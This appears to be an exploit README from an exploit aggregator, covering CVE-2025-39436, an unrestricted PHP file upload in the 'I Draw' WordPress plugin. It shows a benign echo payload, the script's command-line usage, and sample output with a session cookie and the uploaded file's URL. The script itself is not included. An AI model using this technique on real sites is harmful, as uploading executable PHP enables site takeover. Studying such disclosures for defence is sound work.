## https://sploitus.com/exploit?id=56F8949E-69E6-518C-8F8C-AA706442EBC6
# ๐จ WordPress Plugin Exploit: CVE-2025-39436
## ๐ Description
An **Unrestricted Upload of File with Dangerous Type** vulnerability exists in the "I Draw" WordPress plugin. This exploit allows attackers to upload malicious files without restriction. The issue impacts **I Draw versions up to 1.0**.
---
## ๐ ๏ธ Exploit Details
The exploit leverages the plugin's file upload functionality to execute a PHP payload. Below is the default payload used:
```php
php_code = "<?php echo 'Im Nxploited | Khaled Alenazi'; ?>"
```
---
## ๐ Usage
```bash
usage: CVE-2025-39436.py [-h] -u URL -un USERNAME -p PASSWORD
options:
-h, --help Show this help message and exit
-u, --url URL Target website URL
-un, --username USERNAME
Username
-p, --password PASSWORD
```
---
## ๐ป Script Output Example
```plaintext
[โ ] Login successful.
[๐ช] Cookies here:
wordpress_logged_in_4b00801d41db6e7d9e0ed0af2c824ea0=admin%7C1746301986%7CZvXtaLwW7AlgtJ9JxOH24nAo8G6WqoSQGYcz6xGSNe1%7C53cc2f686eb1e4265e17fcb0823d5e7349ffdc7b86ec8099453b5e80e7c2b51a
[โ ] File uploaded successfully:
[๐] http://target/wp-content/uploads/2025/4/19/nxploit.php
```
---
## โ ๏ธ Disclaimer
This script is provided for **educational purposes only**. The author takes no responsibility for any misuse or damage caused by this exploit. Use it at your own risk.
---
*By: Nxploited ( Khaled Alenazi )*